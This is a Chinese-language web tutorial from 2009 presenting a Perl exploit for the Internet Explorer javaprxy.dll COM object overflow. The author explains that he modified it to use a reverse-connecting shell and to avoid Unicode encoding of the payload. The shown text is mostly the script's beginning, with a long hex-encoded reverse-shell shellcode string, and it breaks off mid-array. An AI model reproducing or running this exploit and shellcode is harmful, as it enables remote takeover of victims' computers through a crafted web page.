当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > IE javaprxy.dll COM Object漏洞利用程序

安全基础
入侵常用TCP端口作用及其操作建议之十二
入侵常用TCP端口作用及其操作建议之十三
入侵常用TCP端口作用及其操作建议之十四
入侵常用TCP端口作用及其操作建议之十五
Win 2000操作系统二十条超级应用技巧(1)
Win 2000操作系统二十条超级应用技巧(2)
NTFS格式大硬盘数据恢复特殊案例分析
入侵常用TCP端口作用及其操作建议之十六
入侵常用TCP端口作用及其操作建议之十七
入侵常用TCP端口作用及其操作建议之十八
入侵常用TCP端口作用及其操作建议之十九
入侵常用TCP端口作用及其操作建议之二十
入侵常用TCP端口作用及其操作建议之二十一
入侵常用TCP端口作用及其操作建议之二十二
入侵常用TCP端口作用及其操作建议之二十三
入侵常用TCP端口作用及其操作建议之二十四
入侵常用TCP端口作用及其操作建议之二十五
入侵常用TCP端口作用及其操作建议之二十六
入侵常用TCP端口作用及其操作建议之二十七
入侵常用TCP端口作用及其操作建议之二十八

安全基础 中的 IE javaprxy.dll COM Object漏洞利用程序


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 202 ::
收藏到网摘: n/a

 Microsoft Internet Explorer javaprxy.dll COM Object 溢出漏洞是前两天刚刚公布的,类似这样的漏洞我在以前也发过一个。这个漏洞的原理我不多说,总之又是IE的一个洞洞。漏洞利用方式依然采用暴力扩大内存的方式,我这里修改主要针对shellcode做了修改。
本地监听的shellcode没什么利用价值,还是反向的来得舒服。但是这个shellcode修改不是那么容易的是,为了防止shellcode被unicode编码所以要采用点小措施来方法。

整个程序我已经写出来了,如下,完全perl代码:

#! /usr/bin/perl
#doomie.pl

use strict;
use Socket;

my $reverse_shell="\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA".
                              "\xEB\x05\xE8\xEB\xFF\xFF\xFF".
                              "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12".
                              "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99".
                              "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12".
                              "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99".
                              "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9".
                              "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D".
                              "\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA".
                              "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32".
                              "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10".
                              "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8".
                              "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66".
                              "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5".
                              "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8".
&nbs